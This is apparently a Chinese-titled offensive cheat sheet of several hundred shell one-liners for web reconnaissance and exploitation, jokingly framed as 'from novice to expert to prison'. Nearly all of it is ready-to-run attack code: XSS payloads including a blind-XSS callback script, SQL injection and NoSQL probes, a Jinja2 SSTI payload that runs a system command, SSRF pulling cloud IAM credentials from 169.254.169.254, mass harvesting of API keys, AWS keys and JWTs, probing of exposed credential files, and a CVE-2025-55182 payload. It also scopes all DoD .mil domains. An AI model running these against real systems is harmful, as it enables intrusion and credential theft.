从小白入门到专家入狱——400+ 精选实战渗透路径

章节	描述
关于	项目概述与目标
快速入门	5分钟后开始
所需工具	必备工具集
BBRF范围	范围配置
子域枚举	寻找子域
JavaScript Recon	JS 文件分析
XSS检测	跨站脚本
SQL 注入	SQLi 技术
SSRF与SSTI	服务器端攻击
网络爬虫	深层爬行方法
参数发现	隐参数
内容发现	敏感文件
核扫描	自动扫描
API安全测试	API 漏洞
云安全	AWS， GCP， Azure
自动化脚本	现成脚本
狂欢活动	壳体生产率
2024-2025年新一线妙语	最新技术
搜索引擎	黑客搜索引擎
单词列表	最佳词表
资源	书籍、课程、博客

🎯 关于

主要目标是分享渗透的技巧。利用 recon 方法，我们发现了可被利用的子域名、API 和令牌。

🚀 快速入门

在5分钟内完成你的首次侦察：

复制代码

# 1. Install essential tools
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# 2. Run your first recon
subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high

# 3. Profit! 🎉

🛠️ 所需工具

核心工具

Category	Tools	Installation
Subdomain	Subfinder, Amass, Assetfinder, Findomain, Chaos	go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
HTTP	Httpx, Httprobe	go install github.com/projectdiscovery/httpx/cmd/httpx@latest
Crawling	Katana, Gospider, Hakrawler, Cariddi	go install github.com/projectdiscovery/katana/cmd/katana@latest
URLs	Gau, Waybackurls, Waymore	go install github.com/lc/gau/v2/cmd/gau@latest
Scanning	Nuclei, Jaeles, Naabu	go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
XSS	Dalfox, XSStrike, Kxss, Airixss	go install github.com/hahwul/dalfox/v2@latest
SQLi	SQLMap, Ghauri	pip install sqlmap ghauri
Utilities	Anew, Qsreplace, Unfurl, Gf, Uro	go install github.com/tomnomnom/anew@latest
Fuzzing	Ffuf, Feroxbuster	go install github.com/ffuf/ffuf/v2@latest
JS Analysis	Subjs, LinkFinder, SecretFinder, Jsubfinder	go install github.com/lc/subjs@latest

快速安装脚本

复制代码

#!/bin/bash
# One-click install for all Go tools
tools=(
    "github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest"
    "github.com/projectdiscovery/httpx/cmd/httpx@latest"
    "github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest"
    "github.com/projectdiscovery/katana/cmd/katana@latest"
    "github.com/projectdiscovery/naabu/v2/cmd/naabu@latest"
    "github.com/lc/gau/v2/cmd/gau@latest"
    "github.com/tomnomnom/waybackurls@latest"
    "github.com/tomnomnom/anew@latest"
    "github.com/tomnomnom/qsreplace@latest"
    "github.com/tomnomnom/unfurl@latest"
    "github.com/tomnomnom/gf@latest"
    "github.com/hahwul/dalfox/v2@latest"
    "github.com/ffuf/ffuf/v2@latest"
    "github.com/jaeles-project/gospider@latest"
    "github.com/hakluke/hakrawler@latest"
)

for tool in "${tools[@]}"; do
    echo "[+] Installing $tool"
    go install -v "$tool"
done
echo "[✓] All tools installed!"

🎯 BBRF范围

复制代码

# Add all DoD domains to BBRF scope
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' '*.spaceforce.mil' '*.ussf.mil'

💀 子域枚举 ☠️

💀 多源发现（一体化）

复制代码

# ☠️ Ultimate subdomain enumeration - All tools combined
subfinder -d target.com -all -silent | anew subs.txt
amass enum -passive -d target.com | anew subs.txt
assetfinder -subs-only target.com | anew subs.txt
chaos -d target.com -silent | anew subs.txt
findomain -t target.com -q | anew subs.txt
cat subs.txt | httpx -silent -threads 200 | anew alive.txt

💀 证书透明日志

复制代码

# ☠️ crt.sh extraction
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httpx -silent

💀 Shodan + Nuclei 管道

复制代码

# ☠️ Shodan recon -> Nuclei scan
shodan domain target.com | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high

💀 ASN 发现与反向 DNS

复制代码

# ☠️ Find all IPs from organization ASN
echo 'target_org' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'

💀 DNS 暴力破解与 Shuffledns

复制代码

shuffledns -d target.com -w wordlist.txt -r resolvers.txt -silent | httpx -silent | anew

💀 递归子域 Enum

复制代码

subfinder -d target.com -recursive -all -silent | dnsx -silent | httpx -silent | anew recursive_subs.txt

💀 被动DNS------多源

复制代码

# ☠️ HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1 | anew subs.txt

# ☠️ RapidDNS
curl -s "https://rapiddns.io/subdomain/target.com?full=1" | grep -oP '(?<=target="_blank">)[^<]+' | grep "target.com" | anew subs.txt

# ☠️ Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -oP '\b([a-zA-Z0-9]([a-zA-Z0-9-]*[a-zA-Z0-9])?\.)+target\.com\b' | anew subs.txt

# ☠️ AlienVault OTX
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/passive_dns" | jq -r '.passive_dns[].hostname' 2>/dev/null | sort -u | anew subs.txt

# ☠️ URLScan.io
curl -s "https://urlscan.io/api/v1/search/?q=domain:target.com" | jq -r '.results[].page.domain' 2>/dev/null | sort -u | anew subs.txt

💀 GitHub子域名抓取

复制代码

github-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt

💀 Censys子域发现

复制代码

# ☠️ Using Censys API
censys search "target.com" --index-type hosts | jq -r '.[] | .name' | sort -u | anew censys_subs.txt

💀 SecurityTrails API

复制代码

# ☠️ SecurityTrails subdomain enumeration
curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" -H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]' | sed 's/$/.target.com/' | anew subs.txt

💀 网络档案子域名

复制代码

# ☠️ Extract subdomains from Wayback Machine
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew wayback_subs.txt

💀 共同爬行提取

复制代码

# ☠️ CommonCrawl subdomain extraction
curl -s "https://index.commoncrawl.org/CC-MAIN-2023-50-index?url=*.target.com&output=json" | jq -r '.url' | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew commoncrawl_subs.txt

💀 VirusTotal 子域

复制代码

# ☠️ VirusTotal API
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=target.com" | jq -r '.subdomains[]' 2>/dev/null | anew vt_subs.txt

💀 DNS区域传输尝试

复制代码

# ☠️ Check for zone transfer vulnerability
dig axfr @ns1.target.com target.com | grep -E "^[a-zA-Z0-9]" | awk '{print $1}' | sed 's/\.$//' | anew zone_transfer.txt

💀 反向IP查找

复制代码

# ☠️ Find domains on same IP
host target.com | awk '/has address/ {print $4}' | xargs -I@ sh -c 'curl -s "https://api.hackertarget.com/reverseiplookup/?q=@"' | anew reverse_ip.txt

💀 BGP/ASN距离扫描仪

复制代码

# ☠️ Get ASN and scan all IP ranges
whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+" | xargs -I@ sh -c 'nmap -sL @ | grep "report for" | cut -d" " -f5' | httpx -silent | anew bgp_hosts.txt

💀 来自IP范围的PTR记录

复制代码

# ☠️ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt

💀 全能超级一语连珠

复制代码

# ☠️ THE ULTIMATE SUBDOMAIN HUNTER ☠️
(subfinder -d target.com -all -silent; amass enum -passive -d target.com; assetfinder -subs-only target.com; findomain -t target.com -q; chaos -d target.com -silent; curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g'; curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1; curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g') | sort -u | httpx -silent -threads 100 | anew mega_subs.txt

💀 子域置换/暴力破解

复制代码

# ☠️ Generate permutations and resolve
cat subs.txt | dnsgen - | shuffledns -d target.com -r resolvers.txt -silent | anew permutation_subs.txt

💀 DNS 单词列表 Bruteforce with PureDNS

复制代码

# ☠️ Fast bruteforce with PureDNS
puredns bruteforce wordlist.txt target.com -r resolvers.txt -w puredns_subs.txt

💀 TLS/SSL 证书抓取器

复制代码

# ☠️ Extract subdomains from SSL certificates
echo target.com | httpx -silent | xargs -I@ sh -c 'echo | openssl s_client -connect @:443 2>/dev/null | openssl x509 -noout -text | grep -oP "DNS:[^\s,]+" | sed "s/DNS://"' | sort -u | anew ssl_subs.txt

💀 Favicon Hash - > Shodan

复制代码

# ☠️ Find related hosts via favicon hash
curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}' | xargs -I@ shodan search "http.favicon.hash:@" --fields ip_str,hostnames | anew favicon_hosts.txt

💀 谷歌Dork子域名发现

复制代码

# ☠️ Use Google dorks (manual or with tools)
# site:*.target.com -www
# inurl:target.com

📜 JavaScript Recon

完整的JS流水线

复制代码

subfinder -d target.com -silent | httpx -silent | katana -d 5 -jc -silent | grep -iE '\.js$' | anew js.txt

从 JS 提取秘密

复制代码

cat js.txt | httpx -silent -sr -srd js_files/ && nuclei -t exposures/ -target js.txt

JS 文件上的 LinkFinder

复制代码

cat js.txt | xargs -I@ -P10 bash -c 'python3 linkfinder.py -i @ -o cli 2>/dev/null' | anew endpoints.txt

SecretFinder 大规模扫描

复制代码

cat js.txt | xargs -I@ -P5 python3 SecretFinder.py -i @ -o cli | anew secrets.txt

JS变量提取

复制代码

cat file.js | grep -oE "var\s+\w+\s*=\s*['\"][^'\"]+['\"]" | sort -u

来自 JS 的 API 密钥

复制代码

cat js.txt | nuclei -t http/exposures/tokens/ -silent | anew api_keys.txt

从JS中提取所有URL。

复制代码

cat js.txt | xargs -I@ curl -s @ | grep -oE "(https?://[^\"\'\`\s\<\>]+)" | sort -u | anew js_urls.txt

在 JS 中查找 API 端点

复制代码

cat js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+|/v[0-9]+/[^\"\'\`\s\<\>]+)" | sort -u

提取硬编码凭证

复制代码

cat js.txt | xargs -I@ curl -s @ | grep -iE "(password|passwd|pwd|secret|api_key|apikey|token|auth)" | sort -u

💀 从 JS 文件中提取 AWS 密钥

复制代码

cat js.txt | xargs -I@ curl -s @ | grep -oE "(AKIA[0-9A-Z]{16}|ABIA[0-9A-Z]{16}|ACCA[0-9A-Z]{16})" | sort -u | anew aws_keys.txt

💀 在JavaScript中查找S3桶

复制代码

cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com|s3://[a-zA-Z0-9.-]+" | sort -u | anew s3_from_js.txt

💀 提取 Google API 密钥

复制代码

cat js.txt | xargs -I@ curl -s @ | grep -oE "AIza[0-9A-Za-z\\-_]{35}" | sort -u | anew google_api_keys.txt

💀 在JS中查找Firebase的URL。

复制代码

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://[a-zA-Z0-9-]+\.firebaseio\.com|https://[a-zA-Z0-9-]+\.firebaseapp\.com" | sort -u | anew firebase_urls.txt

💀 从 JS 中提取 GraphQL 端点

复制代码

cat js.txt | xargs -I@ curl -s @ | grep -oE "(graphql|gql|query|mutation)[^\"']*" | grep -oE "/[a-zA-Z0-9/_-]*graphql[a-zA-Z0-9/_-]*" | sort -u | anew graphql_endpoints.txt

💀 在 JS 中查找内部 IP 和主机名

复制代码

cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}[^\"' ]*|https?://[a-zA-Z0-9-]+\.(internal|local|corp|lan|intra)[^\"' ]*" | sort -u | anew internal_hosts.txt

💀 从 JS 文件中提取 JWT 令牌

复制代码

cat js.txt | xargs -I@ curl -s @ | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | sort -u | anew jwt_tokens.txt

💀 查找Webpack源代码地图

复制代码

cat js.txt | sed 's/\.js$/.js.map/' | httpx -silent -mc 200 -ct -match-string "sourcesContent" | anew sourcemaps.txt

💀 从 JS 中提取 Slack/Discord Webhook

复制代码

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://hooks\.slack\.com/services/[A-Za-z0-9/]+|https://discord\.com/api/webhooks/[0-9]+/[A-Za-z0-9_-]+" | sort -u | anew webhooks.txt

💀 在 JavaScript 中查找隐藏的管理员路由

复制代码

cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txt

💉 XSS检测

达尔福克斯管道

复制代码

cat urls.txt | gf xss | uro | qsreplace '"><svg οnlοad=confirm(1)>' | dalfox pipe --silence --skip-bav

带回调的盲目XSS

复制代码

cat urls.txt | gf xss | qsreplace '"><script src=https://xss.report/c/YOURID></script>' | httpx -silent

Airixss 快速扫描

复制代码

echo target.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg οnlοad=confirm(1)>' | airixss -payload "confirm(1)"

Knoxss API

复制代码

cat urls.txt | gf xss | uro | xargs -I@ curl -s "https://knoxss.me/api/v3" -d "target=@" -H "X-API-KEY: YOUR_KEY"

DOM XSS检测

复制代码

cat js.txt | xargs -I@ bash -c 'curl -s @ | grep -E "(document\.(location|URL|cookie|domain|referrer)|innerHTML|outerHTML|eval\(|\.write\()" && echo "--- @ ---"'

带核DAST的质量XSS

复制代码

cat urls.txt | httpx -silent | nuclei -dast -t dast/vulnerabilities/xss/ -rl 50

反射参数检测

复制代码

cat urls.txt | kxss 2>/dev/null | grep -v "Not Reflected" | anew reflected_params.txt

XSS 多语种测试

复制代码

cat urls.txt | gf xss | qsreplace "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcLiCk=alert() )//" | httpx -silent -mr "alert"

🗄️ SQL 注入

SQLMap质扫描

复制代码

cat urls.txt | gf sqli | uro | anew sqli.txt && sqlmap -m sqli.txt --batch --random-agent --level 2 --risk 2

基于错误的检测

复制代码

cat urls.txt | gf sqli | qsreplace "'" | httpx -silent -ms "error|sql|syntax|mysql|postgresql|oracle" | anew sqli_errors.txt

基于时间盲

复制代码

cat urls.txt | gf sqli | qsreplace "1' AND SLEEP(5)-- -" | httpx -silent -timeout 10 | anew time_based.txt

加乌里扫描

复制代码

cat sqli.txt | xargs -I@ ghauri -u @ --batch --level 3

联合探测

复制代码

cat urls.txt | gf sqli | qsreplace "1 UNION SELECT NULL,NULL,NULL-- -" | httpx -silent -mc 200

基于布尔的检测

复制代码

cat urls.txt | gf sqli | qsreplace "1' AND '1'='1" | httpx -silent -mc 200 | anew boolean_sqli.txt

NoSQL 注入

复制代码

cat urls.txt | qsreplace '{"$gt":""}' | httpx -silent -mc 200 | anew nosqli.txt
cat urls.txt | qsreplace "admin'||'1'=='1" | httpx -silent | anew nosqli.txt

🌐 SSRF与SSTI

SSRF与Interactsh合作

复制代码

cat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx -silent

SSRF 参数模糊

复制代码

cat urls.txt | qsreplace "http://169.254.169.254/latest/meta-data/" | httpx -silent -match-string "ami-id"

SSTI检测

复制代码

cat urls.txt | gf ssti | qsreplace "{{7*7}}" | httpx -silent -match-string "49" | anew ssti_vuln.txt

SSTI有效载荷测试

复制代码

cat urls.txt | qsreplace '${7*7}' | httpx -silent -mr "49" && cat urls.txt | qsreplace '<%= 7*7 %>' | httpx -silent -mr "49"

完整的SSRF链

复制代码

cat params.txt | grep -iE "(url|uri|path|src|dest|redirect|redir|return|next|target|out|view|page|show|fetch|load)" | qsreplace "http://YOURSERVER" | httpx -silent

SSRF 与 DNS 重绑定

复制代码

cat urls.txt | gf ssrf | qsreplace "http://7f000001.burpcollaborator.net" | httpx -silent

Jinja2 SSTI

复制代码

cat urls.txt | qsreplace "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}" | httpx -silent

🕷️ 网络爬虫

武士刀深潜

复制代码

katana -u https://target.com -d 10 -jc -kf all -aff -silent | anew crawl.txt

Gospider全爬

复制代码

gospider -s https://target.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico)" | anew

哈克劳勒与瞄准镜

复制代码

echo https://target.com | hakrawler -d 5 -subs -u | anew hakrawler.txt

ParamSpider 发现

复制代码

paramspider -d target.com --exclude woff,css,js,png,svg,jpg -o params.txt

用无头浏览器爬行

复制代码

katana -u https://target.com -headless -d 5 -jc -silent | anew headless_crawl.txt

提取物形式

复制代码

katana -u https://target.com -f qurl -silent | grep "?" | anew forms.txt

🔑 参数发现

X8 隐藏参数

复制代码

cat urls.txt | httpx -silent | xargs -I@ x8 -u @ -w params.txt

阿尔琼发现号

复制代码

arjun -i urls.txt -oT arjun_params.txt --stable

自定义参数暴力破解

复制代码

cat urls.txt | sed 's/$/\?FUZZ=test/' | ffuf -w params.txt:FUZZ -u FUZZ -mc 200,301,302 -ac

JS中的矿山参数

复制代码

cat js.txt | xargs -I@ curl -s @ | grep -oE "[?&][a-zA-Z0-9_]+=" | cut -d'=' -f1 | tr -d '?&' | sort -u

参数污染测试

复制代码

cat urls.txt | qsreplace 'param=value1&param=value2' | httpx -silent -mc 200

📁 内容发现

Ffuf Directory Bruteforce

复制代码

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -ac -c -t 100

肠道暴露

复制代码

cat urls.txt | httpx -silent -path /.git/config -mc 200 -ms "[core]" | anew git_exposed.txt

敏感文件

复制代码

cat urls.txt | httpx -silent -path /.env,/config.php,/wp-config.php.bak,/.htaccess,/server-status -mc 200 | anew sensitive.txt

备份文件

复制代码

cat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 && cat urls.txt | sed 's/$/.old/' | httpx -silent -mc 200

API 文档

复制代码

cat urls.txt | httpx -silent -path /swagger.json,/openapi.json,/api-docs,/swagger-ui.html -mc 200 | anew api_docs.txt

源代码泄露

复制代码

cat urls.txt | httpx -silent -path /.svn/entries,/.bzr/README,/CVS/Root -mc 200 | anew vcs_exposed.txt

配置文件

复制代码

cat alive.txt | httpx -silent -path /config.json,/config.yaml,/config.yml,/settings.json,/app.config -mc 200 | anew configs.txt

数据库文件

复制代码

cat alive.txt | httpx -silent -path /database.sql,/db.sql,/backup.sql,/dump.sql -mc 200 | anew db_files.txt

⚡ 核扫描

全模板扫描

复制代码

nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high,medium -c 50 -rl 150 -o nuclei_results.txt

CVE扫描

复制代码

nuclei -l alive.txt -t cves/ -severity critical,high -c 30 -o cve_results.txt

子域名接管

复制代码

subfinder -d target.com -silent | httpx -silent | nuclei -t takeovers/ -c 50

裸露面板

复制代码

nuclei -l alive.txt -t exposed-panels/ -c 50 | anew panels.txt

配置错误

复制代码

nuclei -l alive.txt -t misconfiguration/ -severity high,critical | anew misconfig.txt

DAST模式

复制代码

nuclei -l urls.txt -dast -rl 10 -c 3 -o dast_results.txt

自定义标签

复制代码

nuclei -l alive.txt -tags cve,rce,sqli,xss -severity critical,high -o tagged_results.txt

网络扫描

复制代码

nuclei -l ips.txt -t network/ -c 25 -o network_vulns.txt

🔌 API安全测试

GraphQL 内省

复制代码

cat urls.txt | httpx -silent -path /graphql -mc 200 | xargs -I@ curl -s @ -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' | grep -v "error"

REST API 枚举

复制代码

cat alive.txt | httpx -silent -path /api/v1,/api/v2,/api/v3,/api/swagger.json -mc 200 | anew api_endpoints.txt

JWT分析

复制代码

cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | anew jwts.txt

API 密钥泄露

复制代码

cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oiE "(api[_-]?key|apikey|api_secret)[=:]['\"]?[a-zA-Z0-9]{16,}['\"]?" | anew api_keys.txt

认证失效

复制代码

# Test endpoints without auth
cat api_endpoints.txt | httpx -silent -mc 200 -fc 401,403 | anew no_auth_endpoints.txt

速率限制测试

复制代码

for i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" "https://target.com/api/endpoint"; done | sort | uniq -c

BOLA/IDOR 测试

复制代码

cat urls.txt | grep -oE "(id|user_id|account_id|uid)=[0-9]+" | sed 's/=[0-9]*/=FUZZ/' | sort -u | anew bola_candidates.txt

☁️ 云安全

AWS S3 桶查找器

复制代码

cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt

S3权限检查

复制代码

cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'

Firebase 数据库

复制代码

cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"

Azure Blob Storage

复制代码

cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txt

GCP 存储

复制代码

cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt

AWS 元数据 SSRF

复制代码

cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"

云凭证文件

复制代码

cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt

🤖 自动化脚本

全面侦察管道

复制代码

#!/bin/bash
domain=$1
mkdir -p $domain && cd $domain

# Subdomains
subfinder -d $domain -all -silent | anew subs.txt
amass enum -passive -d $domain | anew subs.txt
assetfinder -subs-only $domain | anew subs.txt

# Alive check
cat subs.txt | httpx -silent -threads 100 | anew alive.txt

# URLs
cat alive.txt | katana -d 5 -jc -silent | anew urls.txt
cat alive.txt | waybackurls | anew urls.txt
cat alive.txt | gau --threads 50 | anew urls.txt

# Vulnerability patterns
cat urls.txt | gf xss | anew xss.txt
cat urls.txt | gf sqli | anew sqli.txt
cat urls.txt | gf ssrf | anew ssrf.txt
cat urls.txt | gf lfi | anew lfi.txt

# Nuclei scan
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt

XSS 猎人脚本

复制代码

#!/bin/bash
target=$1
echo $target | waybackurls | anew urls.txt
echo $target | gau | anew urls.txt
cat urls.txt | gf xss | uro | qsreplace '"><img src=x οnerrοr=alert(1)>' | airixss -payload "alert(1)" | tee xss_found.txt
cat urls.txt | gf xss | uro | dalfox pipe --silence | tee -a xss_found.txt

API Recon 脚本

复制代码

#!/bin/bash
target=$1
mkdir -p $target/api && cd $target/api

# Find API endpoints
cat ../alive.txt | httpx -silent -path /api,/api/v1,/api/v2,/swagger.json,/openapi.json | anew api_endpoints.txt

# Extract from JS
cat ../js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+)" | sort -u | anew js_api_endpoints.txt

# Test GraphQL
cat ../alive.txt | httpx -silent -path /graphql,/graphiql,/playground -mc 200 | anew graphql.txt

echo "[+] API recon complete!"

⚙️ 狂欢活动

添加你的或：.bashrc``.zshrc

复制代码

# Quick recon
recon() {
    subfinder -d $1 -silent | anew subs.txt
    assetfinder -subs-only $1 | anew subs.txt
    cat subs.txt | httpx -silent | anew alive.txt
    echo "[+] Found $(wc -l < alive.txt) alive hosts"
}

# XSS scan
xscan() {
    echo $1 | waybackurls | gf xss | uro | qsreplace '"><svg οnlοad=confirm(1)>' | airixss -payload "confirm(1)"
}

# SQLi scan
sqscan() {
    echo $1 | waybackurls | gf sqli | uro | qsreplace "'" | httpx -silent -ms "error|syntax|mysql"
}

# JS recon
jsrecon() {
    echo $1 | waybackurls | grep -iE "\.js$" | httpx -silent | nuclei -t exposures/
}

# Nuclei quick
nuke() {
    echo $1 | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
}

# Full pipeline
fullrecon() {
    recon $1
    cat alive.txt | katana -d 3 -jc -silent | anew urls.txt
    cat urls.txt | gf xss | anew xss.txt
    cat urls.txt | gf sqli | anew sqli.txt
    nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
}

# Certificate search
cert() {
    curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}

# Parameter extraction
params() {
    echo $1 | waybackurls | grep "=" | uro | unfurl keys | sort -u
}

# Subdomain takeover check
takeover() {
    subfinder -d $1 -silent | httpx -silent | nuclei -t takeovers/ -c 50
}

# Port scan
portscan() {
    naabu -host $1 -top-ports 1000 -silent | httpx -silent | anew $1_ports.txt
}

# Screenshot all
screenshot() {
    cat $1 | xargs -I@ gowitness single @ -o screenshots/
}

🆕 2024-2025年新一线妙语

⚡🔥⚡ React2Shell - CVE-2025-55182（CVSS 10.0 - 关键） ⚡🔥⚡

💀 React 服务器组件及Next.js中的关键 RCE - 正处于主动利用中！加入CISA KEV 💀

⚡ 侦测Next.js应用（先侦察）

复制代码

cat alive.txt | httpx -silent -match-string "/_next/" -match-string "__NEXT_DATA__" | anew nextjs_targets.txt

⚡ 检查下一步动作头是否被接受

复制代码

curl -s -o /dev/null -w "%{http_code}" -X POST https://target.com -H "Next-Action: test" -H "Content-Type: text/plain" --data '0'

⚡ 质量检测 - 接受下一步动作头部

复制代码

cat alive.txt | xargs -I@ -P20 sh -c 'RES=$(curl -s -o /dev/null -w "%{http_code}" -X POST @ -H "Next-Action: x" --data "0" 2>/dev/null); [ "$RES" != "404" ] && [ "$RES" != "000" ] && echo "POTENTIALLY VULN: @ [$RES]"' | tee react2shell_candidates.txt

⚡ 创建用于测试的有效载荷文件

复制代码

# Create payload.json (safe math check - no RCE)
echo '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"7*7","_formData":{"get":"$1:constructor:constructor"}}}' > payload.json && echo '"$@0"' > trigger.txt

⚡ 用cURL手动检查漏洞

复制代码

curl -X POST https://target.com -H "Next-Action: check" -F "0=@payload.json" -F "1=@trigger.txt" --max-time 5 -v 2>&1 | grep -iE "(49|error|stack|trace)"

⚡ 一句话：全检测流水线

复制代码

subfinder -d target.com -silent | httpx -silent | while read url; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" -H "Next-Action: x" -H "Content-Type: text/plain" --data "0" 2>/dev/null); [[ "$CODE" =~ ^(200|400|500)$ ]] && echo "[NEXT-ACTION ACCEPTED] $url - HTTP $CODE"; done | tee nextjs_react2shell.txt

⚡ 检测易受攻击响应头

复制代码

cat nextjs_targets.txt | xargs -I@ -P10 sh -c 'curl -s -I -X POST @ -H "Next-Action: test" 2>/dev/null | grep -qi "x-action-redirect" && echo "VULN INDICATOR: @"'

⚡ 使用httpx + Next-Action探针进行质扫描

复制代码

cat alive.txt | httpx -silent -method POST -H "Next-Action: probe" -mc 200,400,500 -title -tech-detect | grep -i "next" | anew react2shell_potential.txt

⚡ Next.js靶的初段

复制代码

shodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew shodan_nextjs.txt

⚡ 核模板检查

复制代码

nuclei -l nextjs_targets.txt -t http/cves/2025/CVE-2025-55182.yaml -c 30 -o react2shell_nuclei.txt

⚡ 查找与测试------完整一句话

复制代码

subfinder -d target.com -silent | httpx -silent -match-string "/_next/" | tee nextjs.txt | xargs -I@ -P15 sh -c 'R=$(curl -s -w "\n%{http_code}" -X POST @ -H "Next-Action: x" --data "test" 2>/dev/null | tail -1); [ "$R" = "200" ] || [ "$R" = "400" ] && echo "[!] REACT2SHELL CANDIDATE: @"' | anew vuln_candidates.txt

⚡ 直接检查RSC端点

复制代码

curl -s -X POST "https://target.com/" -H "Next-Action: whatever" -H "Content-Type: multipart/form-data; boundary=----FormBoundary" --data-binary $'------FormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\ntest\r\n------FormBoundary--' | head -c 500

⚡ 从文件中带并行进行批量测试

复制代码

cat urls.txt | parallel -j20 'curl -s -o /dev/null -w "{} - %{http_code}\n" -X POST {} -H "Next-Action: test" --data "0" 2>/dev/null' | grep -E " - (200|400|500)$" | tee react2shell_batch.txt

⚠️受影响： React 19.0.0-19.2.0， Next.js 15.0.4-16.0.6 |**✅ 修复方法：**React 更新 19.0.1/19.1.2/19.2.1

🎯 关键检测： 接受报头的应用 + RSC 反序列化 = 潜在的 RCENext-Action

复制代码

Nuclei DAST XSS

复制代码

echo "https://target.com" | nuclei -dast -t dast/vulnerabilities/xss/ -rl 5

Open Redirect Mass

复制代码

cat urls.txt | gf redirect | qsreplace "https://evil.com" | httpx -silent -location | grep "evil.com"

CORS Misconfiguration

复制代码

